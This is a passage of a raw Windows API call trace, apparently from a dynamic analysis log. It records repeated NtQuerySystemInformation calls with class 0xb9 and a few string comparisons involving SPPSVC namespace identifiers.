(SystemInformationClass=0xb9, SystemInformation=0xa78207c8f0, Length=0x20, ResultLength=0x0) [0289.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c8f0, Length=0x20, ResultLength=0x0) [0289.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x38, ResultLength=0x0) [0289.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x38, ResultLength=0x0) [0289.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca30, Length=0x20, ResultLength=0x0) [0289.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9c0, Length=0x20, ResultLength=0x0) [0289.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9c0, Length=0x20, ResultLength=0x0) [0289.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d080, Length=0x40, ResultLength=0x0) [0289.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d080, Length=0x40, ResultLength=0x0) [0289.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d080, Length=0x40, ResultLength=0x0) [0289.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cfa0, Length=0x30, ResultLength=0x0) [0289.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cfa0, Length=0x30, ResultLength=0x0) [0289.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cea8, Length=0x30, ResultLength=0x0) [0289.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce10, Length=0x38, ResultLength=0x0) [0289.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x50, ResultLength=0x0) [0289.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc00, Length=0x28, ResultLength=0x0) [0289.282] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0289.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x50, ResultLength=0x0) [0289.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x50, ResultLength=0x0) [0289.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x50, ResultLength=0x0) [0289.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x38, ResultLength=0x0) [0289.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9e0, Length=0x28, ResultLength=0x0) [0289.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9e0, Length=0x28, ResultLength=0x0) [0289.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9e0, Length=0x28, ResultLength=0x0) [0289.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca50, Length=0x28, ResultLength=0x0) [0289.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x38, ResultLength=0x0) [0289.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cad0, Length=0x28, ResultLength=0x0) [0289.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cad0, Length=0x28, ResultLength=0x0) [0289.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x38, ResultLength=0x0) [0289.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca30, Length=0x20, ResultLength=0x0) [0289.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9b0, Length=0x20, ResultLength=0x0) [0289.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9b0, Length=0x20, ResultLength=0x0) [0289.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9b0, Length=0x20, ResultLength=0x0) [0289.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x38, ResultLength=0x0) [0289.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca30, Length=0x20, ResultLength=0x0) [0289.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9c0, Length=0x20, ResultLength=0x0) [0289.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9c0, Length=0x20, ResultLength=0x0) [0289.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x50, ResultLength=0x0) [0289.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc00, Length=0x28, ResultLength=0x0) [0289.299] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0289.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x50, ResultLength=0x0) [0289.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x50, ResultLength=0x0) [0289.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x50, ResultLength=0x0) [0289.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x38, ResultLength=0x0) [0289.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9e0, Length=0x28, ResultLength=0x0) [0289.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9e0, Length=0x28, ResultLength=0x0) [0289.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9e0, Length=0x28, ResultLength=0x0) [0289.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca50, Length=0x28, ResultLength=0x0) [0289.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x38, ResultLength=0x0) [0289.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cad0, Length=0x28, ResultLength=0x0) [0289.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cad0, Length=0x28, ResultLength=0x0) [0289.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x38, ResultLength=0x0) [0289.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca30, Length=0x20, ResultLength=0x0) [0289.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9b0, Length=0x20, ResultLength=0x0) [0289.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9b0, Length=0x20, ResultLength=0x0) [0289.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9b0, Length=0x20, ResultLength=0x0) [0289.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x38, ResultLength=0x0) [0289.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca30, Length=0x20, ResultLength=0x0) [0289.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9c0, Length=0x20, ResultLength=0x0) [0289.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9c0, Length=0x20, ResultLength=0x0) [0289.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d380, Length=0x50, ResultLength=0x0) [0289.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d300, Length=0x28, ResultLength=0x0) [0289.319] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0289.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d380, Length=0x50, ResultLength=0x0) [0289.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d380, Length=0x50, ResultLength=0x0) [0289.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d380, Length=0x50, ResultLength=0x0) [0289.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d2b0, Length=0x38, ResultLength=0x0) [0289.325] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d0e0, Length=0x28, ResultLength=0x0) [0289.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d0e0, Length=0x28, ResultLength=0x0) [0289.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d0e0, Length=0x28, ResultLength=0x0) [0289.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d150, Length=0x28, ResultLength=0x0) [0289.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d2b0, Length=0x38, ResultLength=0x0) [0289.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d1d0, Length=0x28, ResultLength=0x0) [0289.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d1d0, Length=0x28, ResultLength=0x0) [0289.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d2b0, Length=0x38, ResultLength=0x0) [0289.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d130, Length=0x20, ResultLength=0x0) [0289.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d0b0, Length=0x20, ResultLength=0x0) [0289.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d0b0, Length=0x20, ResultLength=0x0) [0289.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d0b0, Length=0x20, ResultLength=0x0) [0289.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d2b0, Length=0x38, ResultLength=0x0) [0289.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d130, Length=0x20, ResultLength=0x0) [0289.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d0c0, Length=0x20, ResultLength=0x0) [0289.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d0c0, Length=0x20, ResultLength=0x0) [0289.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d380, Length=0x50, ResultLength=0x0) [0289.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d300, Length=0x28, ResultLength=0x0) [0289.333] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0289.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d380, Length=0x50, ResultLength=0x0) [0289.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d380, Length=0x50, ResultLength=0x0) [0289.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d380, Length=0x50, ResultLength=0x0) [0289.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d2b0, Length=0x38, ResultLength=0x0) [0289.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.340] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d0e0, Length=0x28, ResultLength=0x0) [0289.340] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.340] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.340] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d0e0, Length=0x28, ResultLength=0x0) [0289.340] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0289.340] 